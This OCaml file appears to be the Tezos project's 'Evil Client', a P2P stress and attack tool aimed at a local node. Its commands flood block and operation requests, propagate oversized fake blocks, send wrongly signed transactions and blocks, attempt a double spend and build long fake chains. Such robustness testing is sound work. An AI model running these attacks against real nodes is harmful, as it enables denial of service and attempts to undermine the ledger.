(**************************************************************************) (* *) (* Copyright (c) 2014 - 2016. *) (* Dynamic Ledger Solutions, Inc. *) (* *) (* All rights reserved. No warranty, explicit or implicit, provided. *) (* *) (**************************************************************************) open Format include Logging.Make(struct let name = "attacker" end) module Proto = Client_embedded_proto_alpha module Ed25519 = Proto.Local_environment.Environment.Ed25519 (* the genesis block and network *) let genesis_block_hashed = Block_hash.of_b58check "BLockGenesisGenesisGenesisGenesisGenesisGeneskvg68z" let network = Store.Net genesis_block_hashed let network = Store.Net_id.Id genesis_block_hashed (* the bootstrap accounts and actions like signing to do with them *) let source_account = List.nth Proto.Bootstrap_storage.accounts 4 let destination_account = List.nth Proto.Bootstrap_storage.accounts 0 let wrong_account = List.nth Proto.Bootstrap_storage.accounts 1 let another_account = List.nth Proto.Bootstrap_storage.accounts 2 let signed = Ed25519.append_signature source_account.secret_key let signed_wrong = Ed25519.append_signature wrong_account.secret_key (* forge a block from a list of operations *) let block_forged ?prev ops = let from_int64 x = [ MBytes.of_string Proto.Constants_repr.version_number ; Proto.Fitness_repr.int64_to_bytes x ] in let pred = match prev with None -> genesis_block_hashed | Some x -> x in let block ops = Store.Block_header.{ net_id = network ; predecessor = pred ; timestamp = Time.now () ; fitness = from_int64 1L; operations = ops } in let open Proto in let generate_proof_of_work_nonce () = Sodium.Random.Bigbytes.generate Proto.Tezos_context.Constants.proof_of_work_nonce_size in let generate_seed_nonce () = match Proto.Nonce_storage.of_bytes @@ Sodium.Random.Bigbytes.generate Proto.Tezos_context.Constants.nonce_length with | Error _ -> assert false | Ok nonce -> nonce in Block_repr.forge_header (block ops) Block_repr.{ mining_slot = {level = Raw_level_repr.of_int32_exn 1l ; priority = 0l } ; seed_nonce_hash = Proto.Nonce_storage.hash (generate_seed_nonce ()); proof_of_work_nonce = generate_proof_of_work_nonce () ; } (* forge a transaction *) let tx_forged ?dest amount fee = let open Proto.Operation_repr in let open Proto.Tez_repr in let open Proto.Contract_repr in let trgt = match dest with None -> destination_account | Some dest -> dest in let src = source_account in let tx = Transaction { amount = of_cents_exn amount ; parameters = None ; destination = default_contract trgt.public_key_hash ; } in let op = Sourced_operations ( Manager_operations { source = default_contract src.public_key_hash ; public_key = Some src.public_key ; fee = of_cents_exn fee ; counter = 1l ; operations = [tx] ; }) in forge { net_id = network } op (* forge a list of proposals, california eat your heart out *) let props_forged period props = let open Proto.Operation_repr in let src = source_account in let props = Proposals { period = period ; proposals = props } in let op = Sourced_operations (Delegate_operations { source = src.public_key ; operations = [props] }) in forge { net_id = network } op (* "forge" a ballot *) let ballot_forged period prop vote = let open Proto.Operation_repr in let src = source_account in let ballot = Ballot { period = period ; proposal = prop ; ballot = vote } in let op = Sourced_operations (Delegate_operations { source = src.public_key ; operations = [ballot] }) in forge { net_id = network } op let identity = P2p_types.Identity.generate Crypto_box.default_target (* connect to the network, run an action and then disconnect *) let try_action addr port action = let socket = Lwt_unix.socket PF_INET6 SOCK_STREAM 0 in let uaddr = Ipaddr_unix.V6.to_inet_addr addr in Lwt_unix.connect socket (Lwt_unix.ADDR_INET (uaddr, port)) >>= fun () -> let io_sched = P2p_io_scheduler.create ~read_buffer_size:(1 lsl 14) () in let conn = P2p_io_scheduler.register io_sched socket in P2p_connection.authenticate ~proof_of_work_target:Crypto_box.default_target ~incoming:false conn (addr, port) identity Distributed_db.Raw.supported_versions >>=? fun (_, auth_fd) -> P2p_connection.accept auth_fd Distributed_db.Raw.encoding >>= function | Error _ -> failwith "Connection rejected by peer." | Ok conn -> action conn >>=? fun () -> P2p_connection.close conn >>= fun () -> return () let replicate n x = let rec replicate_acc acc n x = if n <= 0 then acc else replicate_acc (x :: acc) (n-1) x in replicate_acc [] n x let send conn (msg : Distributed_db.Message.t) = P2p_connection.write conn (P2p.Raw.Message msg) let request_block_times block_hash n conn = let open Block_hash in lwt_log_notice "requesting %a block %d times" pp_short block_hash n >>= fun () -> let block_hashes = replicate n block_hash in send conn (Get_block_headers (network, block_hashes)) let request_op_times op_signed n conn = let open Operation_hash in let op_hash = hash_bytes [op_signed] in lwt_log_notice "sending %a transaction" pp_short op_hash >>= fun () -> send conn (Operation op_signed) >>=? fun () -> lwt_log_notice "requesting %a transaction %d times" pp_short op_hash n >>= fun () -> let op_hashes = replicate n op_hash in send conn (Get_operations op_hashes) let send_block_size n conn = let bytes = MBytes.create n in let open Block_hash in lwt_log_notice "propagating fake %d byte block %a" n pp_short (hash_bytes [bytes]) >>= fun () -> send conn (Block bytes) let send_protocol_size n conn = let bytes = MBytes.create n in let open Protocol_hash in lwt_log_notice "propagating fake %d byte protocol %a" n pp_short (hash_bytes [bytes]) >>= fun () -> send conn (Protocol bytes) let send_operation_size n conn = let op_faked = MBytes.create n in let op_hashed = Operation_hash.hash_bytes [op_faked] in lwt_log_notice "propagating fake %d byte operation %a" n Operation_hash.pp_short op_hashed >>= fun () -> send conn (Operation op_faked) >>=? fun () -> let block = signed (block_forged [op_hashed]) in let block_hashed = Block_hash.hash_bytes [block] in lwt_log_notice "propagating block %a with operation" Block_hash.pp_short block_hashed >>= fun () -> send conn (Block block) let send_operation_bad_signature () conn = let open Operation_hash in let signed_wrong_op = signed_wrong (tx_forged 5L 1L) in let hashed_wrong_op = hash_bytes [signed_wrong_op] in lwt_log_notice "propagating operation %a with wrong signature" pp_short hashed_wrong_op >>= fun () -> send conn (Operation signed_wrong_op) >>=? fun () -> let block = signed (block_forged [hashed_wrong_op]) in let block_hashed = Block_hash.hash_bytes [block] in lwt_log_notice "propagating block %a with operation" Block_hash.pp_short block_hashed >>= fun () -> send conn (Block block) let send_block_bad_signature () conn = let open Block_hash in let signed_wrong_block = signed_wrong (block_forged []) in lwt_log_notice "propagating block %a with wrong signature" pp_short (hash_bytes [signed_wrong_block]) >>= fun () -> send conn (Block signed_wrong_block) let double_spend () conn = let spend account = let op_signed = signed (tx_forged ~dest:account 199999999L 1L) in let op_hashed = Operation_hash.hash_bytes [op_signed] in let block_signed = signed (block_forged [op_hashed]) in let block_hashed = Block_hash.hash_bytes [block_signed] in lwt_log_notice "propagating operation %a" Operation_hash.pp_short op_hashed >>= fun () -> send conn (Operation op_signed) >>=? fun () -> lwt_log_notice "propagating block %a" Block_hash.pp_short block_hashed >>= fun () -> send conn (Block block_signed) in spend destination_account >>=? fun () -> spend another_account let long_chain n conn = lwt_log_notice "propogating %d blocks" n >>= fun () -> let prev_ref = ref genesis_block_hashed in let rec loop k = if k < 1 then return () else let block = signed (block_forged ~prev:!prev_ref []) in prev_ref := Block_hash.hash_bytes [block] ; send conn (Block block) >>=? fun () -> loop (k-1) in loop n let lots_transactions amount fee n conn = let signed_op = signed (tx_forged amount fee) in let rec loop k = if k < 1 then return () else send conn (Operation signed_op) >>=? fun () -> loop (k-1) in let ops = replicate n (Operation_hash.hash_bytes [signed_op]) in let signed_block = signed (block_forged ops) in lwt_log_notice "propogating %d transactions" n >>= fun () -> loop n >>=? fun () -> lwt_log_notice "propagating block %a with wrong signature" Block_hash.pp_short (Block_hash.hash_bytes [signed_block]) >>= fun () -> send conn (Block signed_block) let main () = let addr = Ipaddr.V6.localhost in let port = 9732 in let run_action action = try_action addr port action in let run_cmd_unit lwt = Arg.Unit begin fun () -> Lwt_main.run begin lwt () >>= function | Ok () -> Lwt.return_unit | Error err -> lwt_log_error "Error: %a" pp_print_error err >>= fun () -> Lwt.return_unit end end in let run_cmd_int_suffix lwt = Arg.String begin fun str -> let last = str.[String.length str - 1] in let init = String.sub str 0 (String.length str - 1) in let n = if last == 'k' || last == 'K' then int_of_string init * 1 lsl 10 else if last == 'm' || last == 'M' then int_of_string init * 1 lsl 20 else if last == 'g' || last == 'G' then int_of_string init * 1 lsl 30 else int_of_string str in Lwt_main.run begin lwt n >>= function | Ok () -> Lwt.return_unit | Error err -> lwt_log_error "Error: %a" pp_print_error err >>= fun () -> Lwt.return_unit end end in let cmds = [( "-1", run_cmd_int_suffix (run_action << request_block_times genesis_block_hashed), "[N {,K,M,G}] Attempt to request to download N {,kilo,mega,giga}blocks.") ;( "-2", run_cmd_int_suffix (run_action << request_op_times (signed (tx_forged 5L 1L))), "[N {,K,M,G}] Attempt to request to download N {,kilo,mega,giga}ops.") ;( "-3", run_cmd_int_suffix (run_action << send_block_size), "[N {,K,M,G}] Attempt to propagate an N {,kilo,mega,giga}byte fake block.") ;( "-4", run_cmd_int_suffix (run_action << send_operation_size), "[N {,K,M,G}] Attempt to propagate an N {,kilo,mega,giga}byte fake operation.") ;( "-5", run_cmd_int_suffix (run_action << send_protocol_size), "[N {,K,M,G}] Attempt to propagate an N {,kilo,mega,giga}byte fake protocol.") ;( "-6", run_cmd_unit (run_action << send_operation_bad_signature), "Attempt to propagate a transaction with a bad signature.") ;( "-7", run_cmd_unit (run_action << send_block_bad_signature), "Attempt to propagate a block with a bad signature.") ;( "-8", run_cmd_unit (run_action << double_spend), "Attempt to send the same transaction in two blocks") ; ( "-9", run_cmd_int_suffix (run_action << long_chain), "[N {,K,M,G}] Attempt to send a chain of N {,kilo,mega,giga}blocks") ; ( "-10", run_cmd_int_suffix (run_action << lots_transactions 0L 0L), "[N {,K,M,G}] Attempt to send N {,kilo,mega,giga}ops") ] in Arg.parse cmds print_endline "Tezos Evil Client"